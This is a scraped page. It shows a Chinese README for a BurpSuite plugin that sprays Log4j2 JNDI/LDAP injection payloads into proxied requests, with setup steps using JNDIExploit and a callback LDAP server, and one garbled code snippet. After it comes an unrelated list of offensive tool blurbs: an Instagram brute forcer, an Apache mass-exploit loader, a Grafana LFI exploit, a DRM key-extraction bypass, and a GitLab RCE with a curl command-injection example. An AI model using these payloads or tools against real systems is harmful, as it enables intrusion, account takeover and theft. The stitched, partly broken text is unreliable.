BurpSuite Extension: Log4j RCE Scanner

Overview

Log4j2 RCE Scanner

作者:key@元亨实验室

小广告:实验室纳新招人,岗位方向有安全研究(攻防、漏洞)、威胁情报(APT分析)、内部安全(SDL、安全研发),简历投递至邮箱:c2VjdXJpdHlAemhvbmdmdS5uZXQ=

前言

这是一个用于扫描近期爆出的Log4j2 RCE漏洞的BurpSuite插件,其原理就是基于BurpSuite提供的被动式扫描API,对流经Burp Proxy模块的流量进行全量扫描,扫描作用域为:请求参数(JSON字段、正常请求参数、Cookie参数、XML字段、Mulitpart)、请求头(请求自带请求头与自定义请求头)。

它与其他插件的区别:

  1. 一个点一个Payload(Hash区分),便于追踪漏洞位置;
  2. 仅支持LDAP Log接口,不支持DNS扫描探测,便于快速定位有效漏洞位置进行自查自检;
  3. 使用Python(Jython)编写,可以非常快速的进行二次开发、代码阅读,例如你可以改造这个项目为SQL注入、XSS盲打的探测插件;
  4. 支持扫描作用域相对较全。

使用方法

  1. 准备工作:该插件用Python(Jython)所写,所以需要你的BurpSuite加载Jython的Jar包,下载地址:https://repo1.maven.org/maven2/org/python/jython-standalone/2.7.2/jython-standalone-2.7.2.jar,BurpSuite加载位置:BurpSuite - Extender - Options - Python Environment - Location of Jython standalone JAR file。

  2. 准备LDAP Log接口:由于插件的特殊性,在不更改插件代码的情况下,建议你准备一台服务器,在上面部署LDAP服务并提供一个Web API给到插件,这里推荐Command2API项目,搭配JNDIExploit使用。

    python Command2Api.py "java -jar JNDIExploit.v1.2/JNDIExploit-1.2-SNAPSHOT.jar -i 0.0.0.0" 9889

  3. 填写配置:下载Python文件到本地,存储在无空格、无特殊符号、无中文的目录下,接着替换如下代码:

    LDAP 服务的主机地址(域名/IP,请注意内、外网环境) # LDAP_PORT -> LDAP 服务的主机端口 return self._helpers.urlEncode("${jndi:ldap://LDAP_HOST:LDAP_PORT/" + random_md5 + "}")">
    # LDAP_API_HOST -> LDAP Log接口的主机地址(域名/IP,请注意内、外网环境)
    # LDAP_API_PORT -> LDAP Log接口的主机端口
    # LDAP_API_PORT -> LDAP Log接口的路由
    # 建议搭配Command2API项目一起使用,其他接口请自行更改代码
    url = "http://LDAP_API_HOST:LDAP_API_PORT/LDAP_API_ROUTE"
    # LDAP_HOST -> LDAP 服务的主机地址(域名/IP,请注意内、外网环境)
    # LDAP_PORT -> LDAP 服务的主机端口
    return self._helpers.urlEncode("${jndi:ldap://LDAP_HOST:LDAP_PORT/" + random_md5 + "}")

  4. 加载插件:BurpSuite加载位置:BurpSuite - Extender - Extensions - Burp Extensions - Add。

  5. 开始扫描:浏览器挂上BurpSuite代理,让流量流经BurpSuite,插件会自动扫描,或者你可以选择结合爬虫的方式将爬虫流量过到BurpSuite进行扫描。

  6. 扫描结果:扫描结果会在Burp Dashboard中展示出来,并且有具体的请求报文,如下图所示,分别是Command2API与LDAP服务接收的日志(由于该漏洞的触发特殊性,建议对这些日志和BurpSuite流量进行保存)以及Burp的扫描结果。

This program will brute force any Instagram account you send it its way given a list of proxies.

Instagram Bruter This program will brute force any Instagram account you send it its way given a list of proxies. NOTICE I'm no longer maintaining thi

1 Nov 15, 2021
Operational information regarding the vulnerability in the Log4j logging library.

Log4j Vulnerability (CVE-2021-44228) This repo contains operational information regarding the vulnerability in the Log4j logging library (CVE-2021-442

Nationaal Cyber Security Centrum (NCSC-NL) 1.9k Dec 26, 2022
带回显版本的漏洞利用脚本

CVE-2021-21978 带回显版本的漏洞利用脚本,更简单的方式 0. 漏洞信息 VMware View Planner Web管理界面存在一个上传日志功能文件的入口,没有进行认证且写入的日志文件路径用户可控,通过覆盖上传日志功能文件log_upload_wsgi.py,即可实现RCE 漏洞代码

3ky7in4 24 Nov 09, 2022
On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so that you can mass exploit servers using this.

ApacheRCE ApacheRCE is a small little python script that will allow you to input the apache version 2.4.49-2.4.50 and then input a list of ip addresse

3 Dec 04, 2022
🔐 A simple command-line password manager.

PassVault What Is It? It is a command-line password manager, for educational purposes, that stores localy, in AES encryption, your sensitives datas in

5 Aug 15, 2022
Tool to check if your DNS comply to Polish Ministry of Finance gambling domains restrictions

dns-mf-hazard Tool to check if your DNS comply to Polish Ministry of Finance gambling domains restrictions How to use it? Installation You need python

Marek Wajdzik 2 Jan 01, 2022
This repo created for bypassing Widevine L3 DRM and obtaining keys.

First run: Copy headers (with cookies) of POST license request from browser to headers.py like dictionary. pip install -r requirements.txt # if doesn'

Mikhail 263 Jan 07, 2023
Exploit grafana Pre-Auth LFI

Grafana-LFI-8.x Exploit grafana Pre-Auth LFI How to use python3

2 Jul 25, 2022
Profil3r is an OSINT tool that allows you to find potential profiles of a person on social networks, as well as their email addresses 🕵️

Profil3r is an OSINT tool that allows you to find potential profiles of a person on social networks, as well as their email addresses. This program also alerts you to the presence of a data leak for

1.1k Aug 24, 2021
Simples brute forcer de diretorios para web pentest.

🦑 dirbruter Simples brute forcer de diretorios para web pentest. ❕ Atenção Não ataque sites privados. Isto é illegal. 🖥️ Pré-requisitos Ultima versã

Dio brando 6 Jan 22, 2022
A Fast Broken Link Hijacker Tool written in Python

Broken Link Hijacker BrokenLinkHijacker(BLH) is a Fast Broken Link Hijacker Tool written in Python.

Mayank Pandey 70 Nov 30, 2022
A python module for retrieving and parsing WHOIS data

pythonwhois A WHOIS retrieval and parsing library for Python. Dependencies None! All you need is the Python standard library. Instructions The manual

Sven Slootweg 384 Dec 23, 2022
Python program that generates secure passwords.

Python program that generates secure passwords. The user has the option to select the length of the password, amount of passwords,

4 Dec 07, 2021
CVE-2021-22205 Unauthorized RCE

CVE-2021-22205 影响版本: Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog

r0eXpeR 70 Nov 09, 2022
A python script to turn Ubuntu Desktop in a one stop security platform. The InfoSec Fortress installs the packages,tools, and resources to make Ubuntu 20.04 capable of both offensive and defensive security work.

infosec-fortress A python script to turn Ubuntu Desktop into a strong DFIR/RE System with some teeth (Purple Team Ops)! This is intended to create a s

James 41 Dec 30, 2022
Dark-Fb No Login 100% safe

Dark-Fb No Login 100% safe TERMUX • pkg install python2 && git -y • pip2 install requests mechanize tqdm • git clone https://github.com/BOT-033/Sensei

Bukan Hamkel 1 Dec 04, 2021
Update of uncaptcha2 from 2019

YouTube Video Proof of Concept I created a new YouTube Video with technical Explanation for breaking Google's Audio reCAPTCHAs: Click on the image bel

Nikolai Tschacher 153 Dec 20, 2022
This is a js front-end encryption blasting account and password tools

Author:0xAXSDD By Gamma安全实验室 version:1.0 explain:这是一款用户绕过前端js加密进行密码爆破的工具,你无需在意js加密的细节,只需要输入你想要爆破url,以及username输入框的classname,password输入框的clas

75 Nov 25, 2022
This exploit allows to connect to the remote RemoteMouse 3.008 service to virtually press arbitrary keys and execute code on the machine.

RemoteMouse-3.008-Exploit The RemoteMouse application is a program for remotely controlling a computer from a phone or tablet. This exploit allows to

Podalirius 25 Dec 04, 2022
Sentinel-1 SAR time series analysis for OSINT use

SARveillance Sentinel-1 SAR time series analysis for OSINT use. Description Generates a time lapse GIF of the Sentinel-1 satellite images for the loca

21 Dec 09, 2022